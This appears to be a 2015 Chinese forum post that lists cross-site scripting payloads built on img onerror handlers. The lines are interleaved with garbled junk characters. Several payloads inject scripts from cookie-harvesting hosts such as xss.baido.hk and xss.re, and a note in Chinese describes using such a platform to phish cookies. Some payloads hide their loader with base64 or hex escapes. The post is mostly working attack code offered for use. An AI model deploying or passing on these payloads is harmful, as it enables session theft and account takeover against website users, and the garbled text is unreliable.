<img src='non-exist.jpg'onerror="alert('xss')">
2 S: v5 i2 p7 O, d. d! w9 X<img src=# onerror=alert(123)>% m3 ~! x0 Y; t7 s3 r8 d& j& d
<img src=# onerror=alert(document.cookie)>9 n& Y- U. I3 F) o* f2 ?# p! Y
下面是利用平台钓cookie的8 P1 f P1 ]3 U1 I; k$ P0 v: z) _5 R
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>8 M% P$ v# L# I
# r9 S& u3 P# e" l0 Z- c9 e, K" v
. b" [* l+ ]8 c4 _- N- I
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>" i$ ]( s+ q& t# r8 A
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
2 Q+ C- [; L% _4 {# x& w" d1 G“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
* {+ o( V V+ V2 z<img src=1 onerror=jQuery.getScript("//xss.re/974")> ! @! d) O0 F$ O* _0 M. X- F
<img src="#">/ a9 j5 ^! |- J* o
<img src="#">
6 ~, W; x& O, H2 Z: v7 }<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
" Y4 [9 X6 k: M1 Z/ t) A<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
& q+ s, T. l8 {: S' a<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>) n: p& j8 B6 Y& R. T y/ e
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>8 |/ H U# @% U, q
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
" v/ `5 ^7 {6 |7 `<img src=x width="0" height="0"></img>3 H, E9 S: G/ {
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>* W; D2 x# e1 S3 W
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>4 f3 e# J* l. U% A
|
发表于 2015-10-18 14:33:54
收藏
支持
反对